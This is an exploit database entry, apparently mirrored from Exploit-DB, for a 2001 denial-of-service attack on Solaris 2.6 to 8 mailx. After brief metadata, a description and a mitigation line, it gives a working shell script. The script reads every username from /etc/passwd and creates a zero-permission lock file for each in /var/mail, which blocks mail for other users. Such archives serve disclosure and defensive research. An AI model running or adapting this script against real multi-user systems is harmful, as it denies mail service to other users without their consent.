header-logo
Suggest Exploit
vendor:
Solaris
by:
Optyx
3.3
CVSS
LOW
Denial of Service
CWE
Product Name: Solaris
Affected Version From: Solaris 2.6
Affected Version To: Solaris 8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2001

Solaris mailx(1) username.lock proof of theory

The exploit creates a lock file for each user in the /var/mail directory and sets its permissions to 0. This prevents mailx from working for all users except those who can erase the lockfile. However, even for those users, mailx will hang for a long time.

Mitigation:

Remove the lock files created by the exploit and restore the correct permissions to the /var/mail directory.
Source

Exploit-DB raw data:

#!/bin/sh
#
# Solaris mailx(1) username.lock  proof of theory
# makes mailx not work for all users except those
# that  can erase the lockfile even so mailx will
# hang for a long time.
#
# Tested on Solaris 2.6, 7, 8
#
# by Optyx <optyx@uberhax0r.net>
# http://www.uberhax0r.net

echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done


# milw0rm.com [2001-01-03]